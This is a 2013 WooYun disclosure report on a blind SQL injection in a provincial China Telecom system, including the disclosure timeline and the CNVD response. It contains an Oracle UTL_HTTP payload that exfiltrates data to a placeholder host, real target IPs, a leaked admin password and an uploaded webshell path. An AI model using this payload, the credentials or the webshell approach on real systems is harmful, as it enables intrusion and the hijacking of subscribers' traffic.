漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-034945
漏洞标题:某省电信核心系统漏洞可劫持PUSH与N+1系统等
相关厂商:中国电信集团
漏洞作者: 小明是黑阔
提交时间:2013-08-22 08:50
修复时间:2013-10-06 08:51
公开时间:2013-10-06 08:51
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-08-22: 细节已通知厂商并且等待厂商处理中
2013-08-27: 厂商已经确认,细节仅向厂商公开
2013-09-06: 细节向核心白帽子及相关领域专家公开
2013-09-16: 细节向普通白帽子公开
2013-09-26: 细节向实习白帽子公开
2013-10-06: 细节向公众公开
简要描述:
某省电信核心系统存在盲注,之前我报过没通过看到有马甲号报了再报次详细经过吧。。PUSH(广告推送)\N+1(防止多人上网)\P2P(定时限制P2P速率)\等等。。多套系统。。
详细说明:
电信广告推送由来已久,单没人深入调查过,正如我微博上说的,我和小伙伴门调查了该系统。同时拿下了周边很多核心系统,然后发散开来覆盖了3个省共可劫持1000多万宽带用户。
首先广东省入手,弹出回访调查
http://59.37.54.194:3606/111223/InstallRevisit.aspx
该IP1000端口有个废弃的业务管理系统
http://59.37.54.194:1000/
http://121.32.136.21:1000/
http://202.104.214.67:1000/
等
存在盲注。。。。
用户名输入
'and 1=1||( select UTL_HTTP.request('http://XXXX:1000/oracle.php?'||(select banner from v$version where rownum=1)) from dual) and '1'='1
可以把查询转出出来。。由于数据库权限问题,可以读取到PUSH等系统的数据库用户密码,密码虽然加密的,是可以破解。
如1+n系统
http://121.15.207.32:4000/Login.aspx
然后就查到PUSH系统地址总管理地址
https://push.10000.gd.cn:447/
内部是不同的IP地址哈。。
总登录用户是
root
123456Ab
很弱智的密码。。。
然后就可以控制整个省的push。。
由于push可以直接上传webshell且权限挺高,可以提权等。。
又做了后期渗透,拿下了不少权限的机器。但后来清理后门后公开这个了。。
本来想7月7日注册账号,8月8日报电信,9月9日报移动,但是上次疯狗没给通过。。。看到有人马甲号报了类似。。感觉不爽,辛辛苦苦搞的洞子让别人报了。。。
漏洞证明:
这是上面查询语句接收端生成的结果文本。。。
语句有经验的人应该懂
废旧系统权限
http://121.32.136.21:3600/uploads/2013/8/22/f72647a5d4364dcc944fd74d687cc705.aspx
哎。。上传就到这里吧。。。后面提权大家都会的。。不再演示了。。
总之安全问题很大。。还希望电信部门重视,也希望通过吧。。
修复方案:
按照等保与电信行业标准做事。。不要拿用户开玩笑。。。
版权声明:转载请注明来源 小明是黑阔@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-08-27 08:35
厂商回复:
CNVD确认并复现所述多个实例情况,已经在22日作为重要事件通报给中国电信集团公司处置。
rank 20
最新状态:
暂无